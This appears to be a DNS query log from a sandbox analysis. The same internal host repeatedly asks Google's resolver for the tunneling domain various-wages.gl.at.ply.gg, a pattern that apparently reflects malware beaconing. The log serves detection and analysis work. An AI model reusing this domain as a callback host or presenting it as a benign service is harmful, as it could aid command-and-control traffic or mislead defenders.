                                                            Sep 25, 2024 08:32:22.443203926 CEST192.168.2.228.8.8.80x2024Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:22.455250978 CEST192.168.2.228.8.8.80x2024Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:22.467176914 CEST192.168.2.228.8.8.80x2024Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:22.479182005 CEST192.168.2.228.8.8.80x2024Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:22.602196932 CEST192.168.2.228.8.8.80x8aedStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:22.609621048 CEST192.168.2.228.8.8.80x8aedStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:22.616894007 CEST192.168.2.228.8.8.80x8aedStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:22.627548933 CEST192.168.2.228.8.8.80x8aedStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:22.635545015 CEST192.168.2.228.8.8.80x8aedStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:25.980634928 CEST192.168.2.228.8.8.80xc1dcStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:25.987771034 CEST192.168.2.228.8.8.80xc1dcStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:25.994189024 CEST192.168.2.228.8.8.80xc1dcStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:26.000801086 CEST192.168.2.228.8.8.80xc1dcStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:26.008234024 CEST192.168.2.228.8.8.80xc1dcStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:26.129240036 CEST192.168.2.228.8.8.80xdd92Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:26.136918068 CEST192.168.2.228.8.8.80xdd92Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:26.143410921 CEST192.168.2.228.8.8.80xdd92Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:26.149977922 CEST192.168.2.228.8.8.80xdd92Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:26.156522036 CEST192.168.2.228.8.8.80xdd92Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:26.268399000 CEST192.168.2.228.8.8.80x3d17Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:26.275146961 CEST192.168.2.228.8.8.80x3d17Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:26.281569958 CEST192.168.2.228.8.8.80x3d17Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:26.288022041 CEST192.168.2.228.8.8.80x3d17Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:26.294545889 CEST192.168.2.228.8.8.80x3d17Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:26.411201000 CEST192.168.2.228.8.8.80x6e9eStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:26.419406891 CEST192.168.2.228.8.8.80x6e9eStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:26.427403927 CEST192.168.2.228.8.8.80x6e9eStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:26.435333967 CEST192.168.2.228.8.8.80x6e9eStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:26.447406054 CEST192.168.2.228.8.8.80x6e9eStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:26.574553013 CEST192.168.2.228.8.8.80x2bStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:26.582071066 CEST192.168.2.228.8.8.80x2bStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:26.589165926 CEST192.168.2.228.8.8.80x2bStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:26.596298933 CEST192.168.2.228.8.8.80x2bStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:26.607525110 CEST192.168.2.228.8.8.80x2bStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:26.724204063 CEST192.168.2.228.8.8.80xbbbStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:26.735377073 CEST192.168.2.228.8.8.80xbbbStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:26.743266106 CEST192.168.2.228.8.8.80xbbbStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:26.751333952 CEST192.168.2.228.8.8.80xbbbStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:26.759345055 CEST192.168.2.228.8.8.80xbbbStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:26.888185978 CEST192.168.2.228.8.8.80xdc16Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:26.912381887 CEST192.168.2.228.8.8.80xdc16Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:26.919358969 CEST192.168.2.228.8.8.80xdc16Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:26.927289963 CEST192.168.2.228.8.8.80xdc16Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:26.933820963 CEST192.168.2.228.8.8.80xdc16Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:27.053258896 CEST192.168.2.228.8.8.80x8b49Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:27.061407089 CEST192.168.2.228.8.8.80x8b49Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:27.071317911 CEST192.168.2.228.8.8.80x8b49Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:27.079330921 CEST192.168.2.228.8.8.80x8b49Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:27.087426901 CEST192.168.2.228.8.8.80x8b49Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:27.231901884 CEST192.168.2.228.8.8.80x8035Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:28.199753046 CEST192.168.2.228.8.8.80x8035Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:28.206350088 CEST192.168.2.228.8.8.80x8035Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:28.214752913 CEST192.168.2.228.8.8.80x8035Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:28.221210003 CEST192.168.2.228.8.8.80x8035Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:28.346057892 CEST192.168.2.228.8.8.80x5fb6Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:28.355149031 CEST192.168.2.228.8.8.80x5fb6Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:28.361634016 CEST192.168.2.228.8.8.80x5fb6Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:28.368485928 CEST192.168.2.228.8.8.80x5fb6Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:28.375503063 CEST192.168.2.228.8.8.80x5fb6Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:33.158010960 CEST192.168.2.228.8.8.80x4160Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:33.165590048 CEST192.168.2.228.8.8.80x4160Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:33.173455000 CEST192.168.2.228.8.8.80x4160Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:33.181550980 CEST192.168.2.228.8.8.80x4160Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:33.189603090 CEST192.168.2.228.8.8.80x4160Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:33.307554960 CEST192.168.2.228.8.8.80xbc24Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:33.314703941 CEST192.168.2.228.8.8.80xbc24Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:33.323333025 CEST192.168.2.228.8.8.80xbc24Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:33.331459045 CEST192.168.2.228.8.8.80xbc24Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:33.339425087 CEST192.168.2.228.8.8.80xbc24Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:33.466495991 CEST192.168.2.228.8.8.80x1c21Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:33.478104115 CEST192.168.2.228.8.8.80x1c21Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:33.485200882 CEST192.168.2.228.8.8.80x1c21Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:33.491744995 CEST192.168.2.228.8.8.80x1c21Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:33.498956919 CEST192.168.2.228.8.8.80x1c21Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:38.284076929 CEST192.168.2.228.8.8.80x5e36Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:38.291898966 CEST192.168.2.228.8.8.80x5e36Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:38.299360991 CEST192.168.2.228.8.8.80x5e36Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:38.306359053 CEST192.168.2.228.8.8.80x5e36Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:38.313024998 CEST192.168.2.228.8.8.80x5e36Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:38.435250044 CEST192.168.2.228.8.8.80xef93Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:38.450331926 CEST192.168.2.228.8.8.80xef93Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:38.462219000 CEST192.168.2.228.8.8.80xef93Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:38.474226952 CEST192.168.2.228.8.8.80xef93Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:38.486182928 CEST192.168.2.228.8.8.80xef93Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:38.618233919 CEST192.168.2.228.8.8.80x1374Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:38.630239010 CEST192.168.2.228.8.8.80x1374Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:38.642226934 CEST192.168.2.228.8.8.80x1374Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:38.651170015 CEST192.168.2.228.8.8.80x1374Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:38.666224003 CEST192.168.2.228.8.8.80x1374Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:43.524209023 CEST192.168.2.228.8.8.80xb684Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:43.530899048 CEST192.168.2.228.8.8.80xb684Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:43.537955046 CEST192.168.2.228.8.8.80xb684Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:43.545120001 CEST192.168.2.228.8.8.80xb684Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:43.552392960 CEST192.168.2.228.8.8.80xb684Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:43.664305925 CEST192.168.2.228.8.8.80xffcStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:43.671662092 CEST192.168.2.228.8.8.80xffcStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:43.678430080 CEST192.168.2.228.8.8.80xffcStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:43.685204029 CEST192.168.2.228.8.8.80xffcStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:43.695975065 CEST192.168.2.228.8.8.80xffcStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:46.834187984 CEST192.168.2.228.8.8.80xc324Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:46.843404055 CEST192.168.2.228.8.8.80xc324Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:46.855416059 CEST192.168.2.228.8.8.80xc324Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:46.867352962 CEST192.168.2.228.8.8.80xc324Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:46.878695011 CEST192.168.2.228.8.8.80xc324Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:47.007249117 CEST192.168.2.228.8.8.80x76c6Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:47.019402027 CEST192.168.2.228.8.8.80x76c6Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:47.027404070 CEST192.168.2.228.8.8.80x76c6Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:47.035356045 CEST192.168.2.228.8.8.80x76c6Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:47.042258024 CEST192.168.2.228.8.8.80x76c6Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:51.633084059 CEST192.168.2.228.8.8.80x4084Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:51.640115976 CEST192.168.2.228.8.8.80x4084Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:51.646473885 CEST192.168.2.228.8.8.80x4084Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:51.653728008 CEST192.168.2.228.8.8.80x4084Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:51.660089016 CEST192.168.2.228.8.8.80x4084Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:51.776436090 CEST192.168.2.228.8.8.80x63e3Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:51.784100056 CEST192.168.2.228.8.8.80x63e3Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:51.793049097 CEST192.168.2.228.8.8.80x63e3Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:51.801645994 CEST192.168.2.228.8.8.80x63e3Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:51.808177948 CEST192.168.2.228.8.8.80x63e3Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:51.937958002 CEST192.168.2.228.8.8.80x5e13Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:51.944951057 CEST192.168.2.228.8.8.80x5e13Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:51.951617956 CEST192.168.2.228.8.8.80x5e13Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:51.958879948 CEST192.168.2.228.8.8.80x5e13Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:51.965384960 CEST192.168.2.228.8.8.80x5e13Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:55.587205887 CEST192.168.2.228.8.8.80x4a4Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:55.593888998 CEST192.168.2.228.8.8.80x4a4Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:55.600424051 CEST192.168.2.228.8.8.80x4a4Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:55.606914043 CEST192.168.2.228.8.8.80x4a4Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:55.613390923 CEST192.168.2.228.8.8.80x4a4Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:55.747217894 CEST192.168.2.228.8.8.80xa355Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:55.753621101 CEST192.168.2.228.8.8.80xa355Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:55.760173082 CEST192.168.2.228.8.8.80xa355Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:55.766731977 CEST192.168.2.228.8.8.80xa355Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:55.773258924 CEST192.168.2.228.8.8.80xa355Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:55.898706913 CEST192.168.2.228.8.8.80xb5baStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:55.905291080 CEST192.168.2.228.8.8.80xb5baStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:55.912429094 CEST192.168.2.228.8.8.80xb5baStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:55.919084072 CEST192.168.2.228.8.8.80xb5baStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:55.926112890 CEST192.168.2.228.8.8.80xb5baStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:56.061032057 CEST192.168.2.228.8.8.80xac88Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:56.068155050 CEST192.168.2.228.8.8.80xac88Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:56.074536085 CEST192.168.2.228.8.8.80xac88Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:56.081372976 CEST192.168.2.228.8.8.80xac88Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:56.087717056 CEST192.168.2.228.8.8.80xac88Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:56.230093002 CEST192.168.2.228.8.8.80x6a11Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:56.236912966 CEST192.168.2.228.8.8.80x6a11Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:56.243443966 CEST192.168.2.228.8.8.80x6a11Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:56.250072002 CEST192.168.2.228.8.8.80x6a11Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:56.256591082 CEST192.168.2.228.8.8.80x6a11Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:56.404901981 CEST192.168.2.228.8.8.80xa9fbStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:56.412008047 CEST192.168.2.228.8.8.80xa9fbStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:56.419228077 CEST192.168.2.228.8.8.80xa9fbStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:56.426075935 CEST192.168.2.228.8.8.80xa9fbStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:56.434566021 CEST192.168.2.228.8.8.80xa9fbStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:00.807255983 CEST192.168.2.228.8.8.80x8ea2Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:00.814644098 CEST192.168.2.228.8.8.80x8ea2Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:00.821748972 CEST192.168.2.228.8.8.80x8ea2Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:00.828375101 CEST192.168.2.228.8.8.80x8ea2Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:00.835170984 CEST192.168.2.228.8.8.80x8ea2Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:00.946994066 CEST192.168.2.228.8.8.80x90efStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:00.953433037 CEST192.168.2.228.8.8.80x90efStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:00.960457087 CEST192.168.2.228.8.8.80x90efStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:00.966914892 CEST192.168.2.228.8.8.80x90efStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:00.973819971 CEST192.168.2.228.8.8.80x90efStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:01.087451935 CEST192.168.2.228.8.8.80xb3b9Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:01.094748974 CEST192.168.2.228.8.8.80xb3b9Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:01.101680994 CEST192.168.2.228.8.8.80xb3b9Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:01.108129978 CEST192.168.2.228.8.8.80xb3b9Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:01.115480900 CEST192.168.2.228.8.8.80xb3b9Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:01.227786064 CEST192.168.2.228.8.8.80x2aa7Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:01.235565901 CEST192.168.2.228.8.8.80x2aa7Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:01.242578983 CEST192.168.2.228.8.8.80x2aa7Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:01.249336004 CEST192.168.2.228.8.8.80x2aa7Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:01.256171942 CEST192.168.2.228.8.8.80x2aa7Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:01.373347998 CEST192.168.2.228.8.8.80x5f96Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:01.380060911 CEST192.168.2.228.8.8.80x5f96Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:01.386780977 CEST192.168.2.228.8.8.80x5f96Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:01.393207073 CEST192.168.2.228.8.8.80x5f96Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:01.400394917 CEST192.168.2.228.8.8.80x5f96Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:01.514189005 CEST192.168.2.228.8.8.80x9a19Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:01.521316051 CEST192.168.2.228.8.8.80x9a19Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:01.527993917 CEST192.168.2.228.8.8.80x9a19Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:01.534363985 CEST192.168.2.228.8.8.80x9a19Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
